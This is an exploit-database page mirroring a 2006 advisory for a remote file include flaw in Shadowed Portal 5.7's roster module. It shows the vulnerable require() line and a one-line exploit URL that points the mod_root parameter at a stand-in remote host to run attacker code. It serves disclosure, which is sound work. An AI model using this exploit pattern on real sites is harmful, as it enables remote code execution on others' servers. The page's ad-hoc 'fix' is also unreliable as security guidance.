header-logo
Suggest Exploit
vendor:
Shadowed Portal
by:
milw0rm.com
9,3
CVSS
HIGH
Remote File Include
98
CWE
Product Name: Shadowed Portal
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: YES
Related CWE: N/A
CPE: a:shad0wed:shadowed_portal:5.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Shadowed Portal 5.7. Roster Module (mod_root) Remote File Include

A remote file include vulnerability exists in Shadowed Portal 5.7. Roster Module (mod_root). An attacker can exploit this vulnerability to include arbitrary remote files and execute arbitrary code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the software.
Source

Exploit-DB raw data:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Shadowed Portal 5.7. Roster Module (mod_root) Remote File Include

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Found: Cyber-Security.Org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Version: 5.7

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
c0DE:

in include.php , line 2.

require($mod_root."/latest_member.php");

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

F!X:

-open include.php

-write this code before wrong code (line 2.)

require("code.php");
if($code != $xcode) {
exit;
}

-save and exit.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

3xplo!t:

/modules/character_roster/include.php?mod_root=http://evil_scripts?

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Reference: http://cyber-security.org/DataDetayAll.asp?Data_id=587

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

script download:

http://www.shad0wed.com/view/load/mod:fs/do:dl/id:7059wc8637mzd9966hnb3dgl415413d7541q4032zp43943532ija77112342xd4961670729851147

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# milw0rm.com [2006-12-25]

Navigation

Suggest Exploit

Services By CQR